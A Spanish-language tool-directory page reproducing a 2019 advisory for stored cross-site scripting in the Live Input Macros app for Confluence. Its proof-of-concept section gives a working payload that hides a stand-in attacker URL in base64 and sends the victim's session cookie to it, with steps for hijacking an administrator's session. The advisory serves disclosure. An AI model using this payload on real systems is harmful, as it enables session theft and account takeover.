Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-15233 — (FAB-2019-00157) Vulnerabilidad descubierta por mí CVE-2019-15233 | Kitploit
Herramientas/GitHubGitHub/l0nax/cve-2019-15233
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubl0nax/cve-2019-15233

CVE-2019-15233

(FAB-2019-00157) Vulnerabilidad descubierta por mí CVE-2019-15233

Ver Repositorio
1hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-15233

(FAB-2019-00157) Vulnerabilidad descubierta por mí CVE-2019-15233

Aviso: advisory

Información básica

root@kitploit:~
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH

Créditos

Esta vulnerabilidad de seguridad fue encontrada por Francesco Emanuel Bennici [email protected] de FABMation GmbH.

Descripción

Live Input Macros ofrece a los Usuarios la posibilidad de agregar casillas de verificación, botones de opción, listas desplegables y más a sus páginas de Confluence y realizar cambios sin editar la página.

Un atacante puede ejecutar código JavaScript en el sitio de Confluence si un Usuario agrega el código malicioso.

Esto se puede usar para robar la Cookie de Sesión de un (ej.) Administrador (Secuestro de Sesión).

PoC/ Exploit

Copia este contenido:

root@kitploit:~
Hello World this is my Text Box </p> </div>





alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd

Y crea un nuevo Elemento en una página de Confluence. Pega este texto en él y comparte la página de Confluence con (ej.) un Administrador del sistema y si él accede al sitio, puedes Secuestrar/ "Copiar" su sesión.

Descargar herramienta